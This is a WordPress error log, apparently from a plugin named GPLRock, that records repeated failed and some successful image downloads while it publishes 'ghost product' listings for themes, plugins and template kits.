[02-Apr-2026 11:47:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maroon-photography-wordpress-theme [02-Apr-2026 11:47:50 UTC] GPLRock: Image download failed for product path-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:52 UTC] GPLRock: Image download failed for product path-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/path-wordpress-theme-8154.webp for product path-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:54 UTC] GPLRock: Image download failed for product path-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:56 UTC] GPLRock: Image download failed for product path-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:47:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/path-wordpress-theme-8154.webp for product path-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:47:58 UTC] GPLRock WARNING: Image download failed for product path-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/path-wordpress-theme-8154.webp [02-Apr-2026 11:47:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: path-wordpress-theme [02-Apr-2026 11:47:59 UTC] GPLRock: Image download failed for product gravity-interior-design-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:01 UTC] GPLRock: Image download failed for product gravity-interior-design-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity--interior-design--furniture-store-wordpress-theme-28272.webp for product gravity-interior-design-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:48:03 UTC] GPLRock: Image download failed for product gravity-interior-design-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:05 UTC] GPLRock: Image download failed for product gravity-interior-design-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity--interior-design--furniture-store-wordpress-theme-28272.webp for product gravity-interior-design-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:48:07 UTC] GPLRock WARNING: Image download failed for product gravity-interior-design-furniture-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gravity--interior-design--furniture-store-wordpress-theme-28272.webp [02-Apr-2026 11:48:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gravity-interior-design-furniture-store-wordpress-theme [02-Apr-2026 11:48:07 UTC] GPLRock: Image download failed for product floret-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:09 UTC] GPLRock: Image download failed for product floret-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/floret---creative-multipurpose-wordpress-theme-5136.webp for product floret-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:48:12 UTC] GPLRock: Image download failed for product floret-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:14 UTC] GPLRock: Image download failed for product floret-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/floret---creative-multipurpose-wordpress-theme-5136.webp for product floret-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:48:16 UTC] GPLRock WARNING: Image download failed for product floret-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/floret---creative-multipurpose-wordpress-theme-5136.webp [02-Apr-2026 11:48:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: floret-creative-multipurpose-wordpress-theme [02-Apr-2026 11:48:16 UTC] GPLRock: Image download failed for product laurits-portfolio-and-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:18 UTC] GPLRock: Image download failed for product laurits-portfolio-and-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/laurits---portfolio-and-agency-wordpress-theme-28627.webp for product laurits-portfolio-and-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:48:20 UTC] GPLRock: Image download failed for product laurits-portfolio-and-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:22 UTC] GPLRock: Image download failed for product laurits-portfolio-and-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/laurits---portfolio-and-agency-wordpress-theme-28627.webp for product laurits-portfolio-and-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:48:24 UTC] GPLRock WARNING: Image download failed for product laurits-portfolio-and-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/laurits---portfolio-and-agency-wordpress-theme-28627.webp [02-Apr-2026 11:48:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: laurits-portfolio-and-agency-wordpress-theme [02-Apr-2026 11:48:25 UTC] GPLRock: Image download failed for product greenture-environment-non-profit-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:27 UTC] GPLRock: Image download failed for product greenture-environment-non-profit-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/greenture---environment--non-profit-wordpress-theme-7854.webp for product greenture-environment-non-profit-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:48:29 UTC] GPLRock: Image download failed for product greenture-environment-non-profit-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:31 UTC] GPLRock: Image download failed for product greenture-environment-non-profit-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:48:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/greenture---environment--non-profit-wordpress-theme-7854.webp for product greenture-environment-non-profit-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:48:33 UTC] GPLRock WARNING: Image download failed for product greenture-environment-non-profit-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/greenture---environment--non-profit-wordpress-theme-7854.webp [02-Apr-2026 11:48:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: greenture-environment-non-profit-wordpress-theme [02-Apr-2026 11:50:42 UTC] GPLRock: Image downloaded successfully for product cyber-cloop-cyber-security-elementor-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9e559a1.webp [02-Apr-2026 11:50:42 UTC] GPLRock: Using pre-downloaded image for product cyber-cloop-cyber-security-elementor-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9e559a1.webp [02-Apr-2026 11:50:42 UTC] GPLRock: Ghost product published with image - Product ID: cyber-cloop-cyber-security-elementor-template-kits [02-Apr-2026 11:50:44 UTC] GPLRock: Image downloaded successfully for product cworks-coworking-space-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3074a81a.webp [02-Apr-2026 11:50:44 UTC] GPLRock: Using pre-downloaded image for product cworks-coworking-space-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3074a81a.webp [02-Apr-2026 11:50:44 UTC] GPLRock: Ghost product published with image - Product ID: cworks-coworking-space-elementor-template-kit [02-Apr-2026 11:50:45 UTC] GPLRock: Image downloaded successfully for product custommade-customized-jewellery-goldsmith-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-190a6ae4.webp [02-Apr-2026 11:50:45 UTC] GPLRock: Using pre-downloaded image for product custommade-customized-jewellery-goldsmith-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-190a6ae4.webp [02-Apr-2026 11:50:45 UTC] GPLRock: Ghost product published with image - Product ID: custommade-customized-jewellery-goldsmith-elementor-template-kit [02-Apr-2026 11:50:46 UTC] GPLRock: Image downloaded successfully for product cupid-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e279cf28.webp [02-Apr-2026 11:50:47 UTC] GPLRock: Using pre-downloaded image for product cupid-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e279cf28.webp [02-Apr-2026 11:50:47 UTC] GPLRock: Ghost product published with image - Product ID: cupid-creative-portfolio-elementor-template-kit [02-Apr-2026 11:50:48 UTC] GPLRock: Image downloaded successfully for product cryptopia-nft-crypto-sales-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9ad05be8.webp [02-Apr-2026 11:50:48 UTC] GPLRock: Using pre-downloaded image for product cryptopia-nft-crypto-sales-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9ad05be8.webp [02-Apr-2026 11:50:48 UTC] GPLRock: Ghost product published with image - Product ID: cryptopia-nft-crypto-sales-elementor-template-kit [02-Apr-2026 11:50:49 UTC] GPLRock: Image downloaded successfully for product cryptokit-blockchain-cryptocurrency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b77fcb95.webp [02-Apr-2026 11:50:49 UTC] GPLRock: Using pre-downloaded image for product cryptokit-blockchain-cryptocurrency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b77fcb95.webp [02-Apr-2026 11:50:49 UTC] GPLRock: Ghost product published with image - Product ID: cryptokit-blockchain-cryptocurrency-elementor-template-kit [02-Apr-2026 11:50:50 UTC] GPLRock: Image downloaded successfully for product cryptodax-cryptocurrency-blockchain-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dd78a4cb.webp [02-Apr-2026 11:50:51 UTC] GPLRock: Using pre-downloaded image for product cryptodax-cryptocurrency-blockchain-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dd78a4cb.webp [02-Apr-2026 11:50:51 UTC] GPLRock: Ghost product published with image - Product ID: cryptodax-cryptocurrency-blockchain-elementor-template-kit [02-Apr-2026 11:50:52 UTC] GPLRock: Image downloaded successfully for product cryptize-blockchain-cryptocurrency-bitcoin-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0b647fd.webp [02-Apr-2026 11:50:52 UTC] GPLRock: Using pre-downloaded image for product cryptize-blockchain-cryptocurrency-bitcoin-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0b647fd.webp [02-Apr-2026 11:50:52 UTC] GPLRock: Ghost product published with image - Product ID: cryptize-blockchain-cryptocurrency-bitcoin-elementor-template-kit [02-Apr-2026 11:50:54 UTC] GPLRock: Image downloaded successfully for product cryptiva-cyber-security-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20585659.jpg [02-Apr-2026 11:50:54 UTC] GPLRock: Using pre-downloaded image for product cryptiva-cyber-security-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20585659.jpg [02-Apr-2026 11:50:54 UTC] GPLRock: Ghost product published with image - Product ID: cryptiva-cyber-security-services-elementor-template-kit [02-Apr-2026 11:50:55 UTC] GPLRock: Image downloaded successfully for product crox-esports-gaming-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c5b96f7.webp [02-Apr-2026 11:50:55 UTC] GPLRock: Using pre-downloaded image for product crox-esports-gaming-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c5b96f7.webp [02-Apr-2026 11:50:55 UTC] GPLRock: Ghost product published with image - Product ID: crox-esports-gaming-elementor-template-kit [02-Apr-2026 11:52:12 UTC] GPLRock: Image download failed for product social-locker-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:14 UTC] GPLRock: Image download failed for product social-locker-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-locker---plugin-for-wordpress-25300.webp for product social-locker-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:16 UTC] GPLRock: Image download failed for product social-locker-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:18 UTC] GPLRock: Image download failed for product social-locker-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-locker---plugin-for-wordpress-25300.webp for product social-locker-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:20 UTC] GPLRock WARNING: Image download failed for product social-locker-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/social-locker---plugin-for-wordpress-25300.webp [02-Apr-2026 11:52:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-locker-plugin-for-wordpress [02-Apr-2026 11:52:20 UTC] GPLRock: Image download failed for product blog-layouts-bundle-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:22 UTC] GPLRock: Image download failed for product blog-layouts-bundle-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-layouts-bundle-for-elementor-17160.webp for product blog-layouts-bundle-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:25 UTC] GPLRock: Image download failed for product blog-layouts-bundle-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:27 UTC] GPLRock: Image download failed for product blog-layouts-bundle-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-layouts-bundle-for-elementor-17160.webp for product blog-layouts-bundle-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:29 UTC] GPLRock WARNING: Image download failed for product blog-layouts-bundle-for-elementor. URL: https://meldwp.com/wp-content/uploads/blog-layouts-bundle-for-elementor-17160.webp [02-Apr-2026 11:52:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blog-layouts-bundle-for-elementor [02-Apr-2026 11:52:29 UTC] GPLRock: Image download failed for product woocommerce-live-notifications (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:31 UTC] GPLRock: Image download failed for product woocommerce-live-notifications (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-live-notifications-21909.webp for product woocommerce-live-notifications after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:33 UTC] GPLRock: Image download failed for product woocommerce-live-notifications (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:35 UTC] GPLRock: Image download failed for product woocommerce-live-notifications (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-live-notifications-21909.webp for product woocommerce-live-notifications after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:37 UTC] GPLRock WARNING: Image download failed for product woocommerce-live-notifications. URL: https://meldwp.com/wp-content/uploads/woocommerce-live-notifications-21909.webp [02-Apr-2026 11:52:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-live-notifications [02-Apr-2026 11:52:38 UTC] GPLRock: Image download failed for product hotel-booking-woocommerce-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:40 UTC] GPLRock: Image download failed for product hotel-booking-woocommerce-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-booking---woocommerce-wordpress-plugin-19457.webp for product hotel-booking-woocommerce-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:42 UTC] GPLRock: Image download failed for product hotel-booking-woocommerce-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:44 UTC] GPLRock: Image download failed for product hotel-booking-woocommerce-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-booking---woocommerce-wordpress-plugin-19457.webp for product hotel-booking-woocommerce-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:46 UTC] GPLRock WARNING: Image download failed for product hotel-booking-woocommerce-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/hotel-booking---woocommerce-wordpress-plugin-19457.webp [02-Apr-2026 11:52:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hotel-booking-woocommerce-wordpress-plugin [02-Apr-2026 11:52:46 UTC] GPLRock: Image download failed for product icon-nav-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:48 UTC] GPLRock: Image download failed for product icon-nav-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/icon-nav-for-elementor-10009.webp for product icon-nav-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:51 UTC] GPLRock: Image download failed for product icon-nav-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:53 UTC] GPLRock: Image download failed for product icon-nav-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/icon-nav-for-elementor-10009.webp for product icon-nav-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:55 UTC] GPLRock WARNING: Image download failed for product icon-nav-for-elementor. URL: https://meldwp.com/wp-content/uploads/icon-nav-for-elementor-10009.webp [02-Apr-2026 11:52:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: icon-nav-for-elementor [02-Apr-2026 11:52:55 UTC] GPLRock: Image download failed for product trackalyzer-analytics-custom-tracking-code-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:57 UTC] GPLRock: Image download failed for product trackalyzer-analytics-custom-tracking-code-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:52:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trackalyzer---analytics--custom-tracking-code-for-woocommerce-4298.webp for product trackalyzer-analytics-custom-tracking-code-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:52:59 UTC] GPLRock: Image download failed for product trackalyzer-analytics-custom-tracking-code-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:01 UTC] GPLRock: Image download failed for product trackalyzer-analytics-custom-tracking-code-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/trackalyzer---analytics--custom-tracking-code-for-woocommerce-4298.webp for product trackalyzer-analytics-custom-tracking-code-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:03 UTC] GPLRock WARNING: Image download failed for product trackalyzer-analytics-custom-tracking-code-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/trackalyzer---analytics--custom-tracking-code-for-woocommerce-4298.webp [02-Apr-2026 11:53:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: trackalyzer-analytics-custom-tracking-code-for-woocommerce [02-Apr-2026 11:53:04 UTC] GPLRock: Image download failed for product grid-slider-woocommerce-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:06 UTC] GPLRock: Image download failed for product grid-slider-woocommerce-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grid-slider---woocommerce-wordpress-plugin-9931.webp for product grid-slider-woocommerce-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:08 UTC] GPLRock: Image download failed for product grid-slider-woocommerce-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:10 UTC] GPLRock: Image download failed for product grid-slider-woocommerce-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grid-slider---woocommerce-wordpress-plugin-9931.webp for product grid-slider-woocommerce-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:12 UTC] GPLRock WARNING: Image download failed for product grid-slider-woocommerce-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/grid-slider---woocommerce-wordpress-plugin-9931.webp [02-Apr-2026 11:53:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grid-slider-woocommerce-wordpress-plugin [02-Apr-2026 11:53:12 UTC] GPLRock: Image download failed for product ungrabber-content-protection-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:14 UTC] GPLRock: Image download failed for product ungrabber-content-protection-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ungrabber--content-protection-for-wordpress-27350.webp for product ungrabber-content-protection-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:17 UTC] GPLRock: Image download failed for product ungrabber-content-protection-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:19 UTC] GPLRock: Image download failed for product ungrabber-content-protection-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ungrabber--content-protection-for-wordpress-27350.webp for product ungrabber-content-protection-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:21 UTC] GPLRock WARNING: Image download failed for product ungrabber-content-protection-for-wordpress. URL: https://meldwp.com/wp-content/uploads/ungrabber--content-protection-for-wordpress-27350.webp [02-Apr-2026 11:53:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ungrabber-content-protection-for-wordpress [02-Apr-2026 11:53:21 UTC] GPLRock: Image download failed for product discount-coupons-scheduler-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:23 UTC] GPLRock: Image download failed for product discount-coupons-scheduler-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/discount-coupons-scheduler-for-woocommerce-7718.webp for product discount-coupons-scheduler-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:25 UTC] GPLRock: Image download failed for product discount-coupons-scheduler-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:27 UTC] GPLRock: Image download failed for product discount-coupons-scheduler-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/discount-coupons-scheduler-for-woocommerce-7718.webp for product discount-coupons-scheduler-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:29 UTC] GPLRock WARNING: Image download failed for product discount-coupons-scheduler-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/discount-coupons-scheduler-for-woocommerce-7718.webp [02-Apr-2026 11:53:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: discount-coupons-scheduler-for-woocommerce [02-Apr-2026 11:53:30 UTC] GPLRock: Image download failed for product woocommerce-engine-and-fuel-filter-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:32 UTC] GPLRock: Image download failed for product woocommerce-engine-and-fuel-filter-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-engine-and-fuel-filter-plugin-7118.webp for product woocommerce-engine-and-fuel-filter-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:34 UTC] GPLRock: Image download failed for product woocommerce-engine-and-fuel-filter-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:36 UTC] GPLRock: Image download failed for product woocommerce-engine-and-fuel-filter-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:53:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-engine-and-fuel-filter-plugin-7118.webp for product woocommerce-engine-and-fuel-filter-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:53:38 UTC] GPLRock WARNING: Image download failed for product woocommerce-engine-and-fuel-filter-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-engine-and-fuel-filter-plugin-7118.webp [02-Apr-2026 11:53:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-engine-and-fuel-filter-plugin [02-Apr-2026 11:54:17 UTC] GPLRock: Image downloaded successfully for product bocpak-print-custom-packaging-and-pouches-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ea017e82.webp [02-Apr-2026 11:54:17 UTC] GPLRock: Using pre-downloaded image for product bocpak-print-custom-packaging-and-pouches-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ea017e82.webp [02-Apr-2026 11:54:17 UTC] GPLRock: Ghost product published with image - Product ID: bocpak-print-custom-packaging-and-pouches-wordpress-theme [02-Apr-2026 11:54:17 UTC] GPLRock: Image download failed for product consuloan-multipurpose-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:18 UTC] GPLRock: Image downloaded successfully for product booknetic-wordpress-appointment-booking-and-scheduling-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db33a9df.jpg [02-Apr-2026 11:54:18 UTC] GPLRock: Using pre-downloaded image for product booknetic-wordpress-appointment-booking-and-scheduling-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db33a9df.jpg [02-Apr-2026 11:54:18 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-wordpress-appointment-booking-and-scheduling-system [02-Apr-2026 11:54:19 UTC] GPLRock: Image download failed for product consuloan-multipurpose-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:20 UTC] GPLRock: Image downloaded successfully for product stellarium-horoscope-and-astrology-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95058502.jpg [02-Apr-2026 11:54:20 UTC] GPLRock: Using pre-downloaded image for product stellarium-horoscope-and-astrology-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95058502.jpg [02-Apr-2026 11:54:20 UTC] GPLRock: Ghost product published with image - Product ID: stellarium-horoscope-and-astrology-wordpress-theme [02-Apr-2026 11:54:21 UTC] GPLRock Error: Failed to download image from 